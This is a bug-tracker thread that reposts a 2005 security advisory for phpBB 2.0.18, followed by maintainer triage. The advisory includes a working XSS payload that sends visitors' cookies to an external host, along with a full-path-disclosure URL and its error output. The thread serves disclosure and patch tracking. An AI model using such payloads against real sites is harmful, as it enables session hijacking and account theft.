Filing this for the forum devs. [phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 16.12.2005 from securityreason.com TEAM --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. Contact with author http://www.phpbb.com/about.php. --- 1. XSS --- If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always allow HTML: YES" or are you Guest that you can use this tags: <B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B> Exploit: <B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X="<B "> H A L O </B> and have you cookies. --- 2. Full Path Disclosure --- In file admin/admin_disallow.php is -25-31--- if( !empty($setmodules) ) { $filename = basename(__FILE__); $module['Users']['Disallow'] = append_sid($filename); return; } -25-31--- function append_sid() dosen't exists. And if you have: register_globals = On display_errors = On Try to go: http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1 -RESULT ERROR--- Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disallow.php on line 28 -RESULT ERROR---
Our forums aren't affected by this as we have both HTML and register_globals switched off.
This looks very limited. - XSS if Allowed HTML tags is set to "ON" - Path disclosure if PHP has register_globals = On and display_errors = On Those are non-standard settings... Closing this one, feel free to reopen if phpBB releases a new version.
*** Bug 117560 has been marked as a duplicate of this bug. ***
2.0.19 is out, if you want to revisit this.
Well, phpBB is still security-masked as a semi-permanent security PITA so no, I don't want to revisit this. However www-apps can still bump it to 2.0.19 if they want to, since lots of users security_unmask the thing and accept the risk.
2.0.19 in CVS, just FYI